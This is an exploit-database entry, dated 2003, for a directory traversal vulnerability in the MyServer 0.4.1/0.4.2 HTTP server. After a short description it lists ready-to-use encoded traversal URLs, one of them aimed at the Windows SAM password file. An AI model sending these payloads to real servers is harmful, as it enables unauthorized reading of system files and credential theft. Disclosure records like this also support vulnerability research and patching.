MyServer 0.4.1/0.4.2 - HTTP Server Directory Traversal
| EKU-ID: 28256 | CVE: | OSVDB-ID: |
| Author: Ziv Kamir | Published: 2003-06-17 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 28256 | CVE: | OSVDB-ID: |
| Author: Ziv Kamir | Published: 2003-06-17 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/7944/info The MyServer HTTP server is prone to a file disclosure vulnerability. Encoded directory traversal sequences may be used to break out of the web root directory. Attackers may gain access to files that are readable by the web server as a result. http://www.example.com/%2e%2e/%2e%2e/%2e%2e http://www.example.com/%2e%2e/%2e%2e/%2e%2ewinnt/repair/sam._ http://www.example.com/%2e%2e/logs http://www.example.com/%2e%2e/system